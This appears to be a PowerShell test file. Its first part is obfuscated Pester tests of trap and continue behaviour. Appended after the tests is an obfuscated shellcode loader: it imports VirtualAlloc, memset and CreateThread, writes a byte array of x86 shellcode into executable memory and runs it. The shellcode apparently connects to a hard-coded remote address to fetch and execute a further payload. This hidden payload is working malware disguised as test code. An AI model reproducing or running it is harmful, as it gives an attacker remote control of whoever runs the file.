&("{2}{0}{1}" -f 'escr','ibe','D') ("{1}{3}{2}{0}" -f'rap','Tes','t','t ') -Tags "CI" {
    .("{0}{1}" -f 'Contex','t') ("{4}{1}{3}{0}{2}" -f ' cont',' wit','rol','h flow','Trap') {
        .('It') ((("{19}{12}{21}{7}{6}{5}{15}{9}{11}{1}{2}{10}{17}{4}{13}{16}{20}{18}{3}{8}{14}{0}" -f 'pt block',' shou','ld',' nes','continu','xc','e','r ','ted scr','io',' NOT b','n','t','ed w','i','ept','h','e ','5n7s from a','Line af','en it','e'))-RepLaCE '5n7',[cHAR]39) {
            ${A} = . {trap {("{1}{0}" -f'd','trappe'); continue;}; . {("{1}{0}" -f'ello','h'); throw ("{1}{3}{2}{0}"-f 'n','ex','o','cepti'); ("{1}{0}"-f'd','worl')}}
            ${A}."Leng`Th" | &("{1}{0}{2}" -f 'o','Sh','uld') -Be 2
            ${a} -join "," | .("{0}{1}" -f'Shou','ld') -BeExactly ("{2}{3}{1}{0}" -f ',trapped','lo','he','l')
        }

        .('It') ("{18}{7}{9}{13}{4}{6}{11}{3}{2}{21}{16}{0}{17}{12}{19}{20}{5}{14}{10}{1}{15}{8}" -f'continue','trig','d ','ul','ion','traps s',' ','in','ered','e af',' ','sho','an','ter except','hould be','g','T be ','d and both inner ','L','d out','ter ','NO') {
            ${a} = . {trap {("{1}{0}{2}" -f 'e','out','r trap'); continue;}; . {trap {("{1}{0}{2}" -f 'ner tr','in','ap'); break;}; ("{1}{0}" -f 'lo','hel'); throw ("{2}{0}{1}" -f 'cepti','on','ex'); ("{1}{0}"-f 'rld','wo')}}
            ${A}."L`E`NgTH" | &("{1}{0}" -f 'd','Shoul') -Be 3
            ${A} -join "," | &("{0}{1}" -f'Shoul','d') -BeExactly ("{3}{2}{4}{0}{1}{6}{5}" -f 'er t','r','o,inner trap,ou','hell','t','p','a')
        }

        .('It') ("{11}{8}{5}{7}{10}{0}{1}{9}{3}{4}{6}{12}{2}" -f'ld',' be in','ue','fter c','o','o','nt','n ','pti','voked a','shou','Line after exce','in') {
            ${A} = . {trap {("{0}{3}{1}{2}"-f'ou','t','rap','ter '); continue;} ("{0}{1}"-f'h','ello'); throw ("{0}{2}{1}"-f 'exce','n','ptio'); ("{1}{0}"-f'd','worl')}
            ${a}."LEN`g`Th" | &("{2}{1}{0}" -f'd','houl','S') -Be 3
            ${a} -join "," | .("{1}{0}"-f'ould','Sh') -BeExactly ("{3}{2}{4}{1}{0}" -f'ld','p,wor',',outer','hello',' tra')
        }

        &('It') ("{19}{22}{4}{18}{10}{9}{17}{20}{15}{13}{2}{6}{5}{8}{16}{1}{7}{3}{11}{14}{21}{0}{12}" -f 'rigge','ner tr','o','p sho','ter e','d a','ke','a','n','n s','ptio','uld','red','T be inv',' no','uld NO','d in','h','xce','Line ','o','t be t','af') {
            ${a} = . {trap {("{0}{2}{1}"-f'oute','ap','r tr'); continue;}; . {trap [system.Argumentexception] {("{1}{2}{0}"-f'trap','inn','er '); continue;}; ("{0}{1}"-f'hell','o'); throw ("{0}{2}{1}"-f'ex','tion','cep'); ("{1}{0}"-f'ld','wor')}}
            ${a}."LE`NgtH" | &("{1}{0}" -f 'ould','Sh') -Be 2
            ${a} -join "," | &("{1}{2}{0}" -f'd','S','houl') -BeExactly ("{1}{0}{2}{3}" -f 'ute','hello,o','r t','rap')
        }
    }
}

${C} = ((("{59}{14}{30}{8}{22}{58}{46}{27}{23}{29}{31}{13}{66}{11}{36}{4}{20}{43}{2}{1}{37}{57}{28}{7}{67}{24}{18}{60}{52}{45}{16}{38}{34}{35}{21}{48}{32}{49}{47}{51}{65}{19}{5}{53}{12}{0}{10}{6}{50}{9}{17}{41}{33}{64}{61}{69}{55}{71}{70}{25}{40}{39}{62}{63}{3}{26}{56}{44}{68}{54}{42}{15}"-f 'lpParameter, uint dwCreationFlags, IntPtr lpT','tion','flAlloca','r des',', uint d','r','DllImp',' ui','ernel32.dllevZ)]pu','vcrt.','hreadId);[','t','Ptr ','I','rt(ev','t);','tatic extern IntPt','dl','llImp','dd','wSi','d(IntPtr','blic st','tP','flProtect);[D','tr ','t, ui',' In','e,','tr Virtua','Zk','lAlloc(','tributes, uint d',']publ','ateTh','rea','Ptr lpAddress','Ty','r Cre','(I','memset','levZ)','oun','ze, uint ',', ','.dllevZ)]public s','tern',', In',' lpThreadAt','wStackSize','ort(evZms','tPtr lpSt','(evZkernel32','ess, Int','nt c','e','nt src','p','atic ex','[DllImpo','ort','ti','n','tPt','ic sta','artA','n','nt ','ui','c ext',' IntP','rn'))  -CRePLaCE  ([cHaR]101+[cHaR]118+[cHaR]90),[cHaR]34);${W} = .("{2}{1}{0}" -f'ype','-T','Add') -memberDefinition ${c} -Name ("{0}{1}" -f'Win','32') -namespace ("{2}{1}{0}" -f'ctions','32Fun','Win') -passthru;[Byte[]];[Byte[]]${Z} = 0xfc,0xe8,0x82,0x00,0x00,0x00,0x60,0x89,0xe5,0x31,0xc0,0x64,0x8b,0x50,0x30,0x8b,0x52,0x0c,0x8b,0x52,0x14,0x8b,0x72,0x28,0x0f,0xb7,0x4a,0x26,0x31,0xff,0xac,0x3c,0x61,0x7c,0x02,0x2c,0x20,0xc1,0xcf,0x0d,0x01,0xc7,0xe2,0xf2,0x52,0x57,0x8b,0x52,0x10,0x8b,0x4a,0x3c,0x8b,0x4c,0x11,0x78,0xe3,0x48,0x01,0xd1,0x51,0x8b,0x59,0x20,0x01,0xd3,0x8b,0x49,0x18,0xe3,0x3a,0x49,0x8b,0x34,0x8b,0x01,0xd6,0x31,0xff,0xac,0xc1,0xcf,0x0d,0x01,0xc7,0x38,0xe0,0x75,0xf6,0x03,0x7d,0xf8,0x3b,0x7d,0x24,0x75,0xe4,0x58,0x8b,0x58,0x24,0x01,0xd3,0x66,0x8b,0x0c,0x4b,0x8b,0x58,0x1c,0x01,0xd3,0x8b,0x04,0x8b,0x01,0xd0,0x89,0x44,0x24,0x24,0x5b,0x5b,0x61,0x59,0x5a,0x51,0xff,0xe0,0x5f,0x5f,0x5a,0x8b,0x12,0xeb,0x8d,0x5d,0x68,0x33,0x32,0x00,0x00,0x68,0x77,0x73,0x32,0x5f,0x54,0x68,0x4c,0x77,0x26,0x07,0xff,0xd5,0xb8,0x90,0x01,0x00,0x00,0x29,0xc4,0x54,0x50,0x68,0x29,0x80,0x6b,0x00,0xff,0xd5,0x6a,0x05,0x68,0x97,0x28,0x48,0xef,0x68,0x02,0x00,0x10,0xf7,0x89,0xe6,0x50,0x50,0x50,0x50,0x40,0x50,0x40,0x50,0x68,0xea,0x0f,0xdf,0xe0,0xff,0xd5,0x97,0x6a,0x10,0x56,0x57,0x68,0x99,0xa5,0x74,0x61,0xff,0xd5,0x85,0xc0,0x74,0x0a,0xff,0x4e,0x08,0x75,0xec,0xe8,0x61,0x00,0x00,0x00,0x6a,0x00,0x6a,0x04,0x56,0x57,0x68,0x02,0xd9,0xc8,0x5f,0xff,0xd5,0x83,0xf8,0x00,0x7e,0x36,0x8b,0x36,0x6a,0x40,0x68,0x00,0x10,0x00,0x00,0x56,0x6a,0x00,0x68,0x58,0xa4,0x53,0xe5,0xff,0xd5,0x93,0x53,0x6a,0x00,0x56,0x53,0x57,0x68,0x02,0xd9,0xc8,0x5f,0xff,0xd5,0x83,0xf8,0x00,0x7d,0x22,0x58,0x68,0x00,0x40,0x00,0x00,0x6a,0x00,0x50,0x68,0x0b,0x2f,0x0f,0x30,0xff,0xd5,0x57,0x68,0x75,0x6e,0x4d,0x61,0xff,0xd5,0x5e,0x5e,0xff,0x0c,0x24,0xe9,0x71,0xff,0xff,0xff,0x01,0xc3,0x29,0xc6,0x75,0xc7,0xc3,0xbb,0xf0,0xb5,0xa2,0x56,0x6a,0x00,0x53,0xff,0xd5;${g} = 0x1000;if (${Z}."Le`NGTH" -gt 0x1000){${g} = ${Z}."leng`Th"};${X}=${W}::("{3}{2}{1}{0}"-f'Alloc','l','ua','Virt').Invoke(0,0x1000,${G},0x40);for (${I}=0;${i} -le (${Z}."LEn`G`Th"-1);${i}++) {${w}::"ME`m`sEt"([IntPtr](${x}.("{1}{0}{2}"-f 'oInt3','T','2').Invoke()+${i}), ${Z}[${i}], 1)};${W}::("{3}{0}{1}{2}"-f 'te','Thre','ad','Crea').Invoke(0,0,${x},0,0,0);for (;;){&("{0}{2}{1}"-f 'S','rt-sleep','ta') 60};
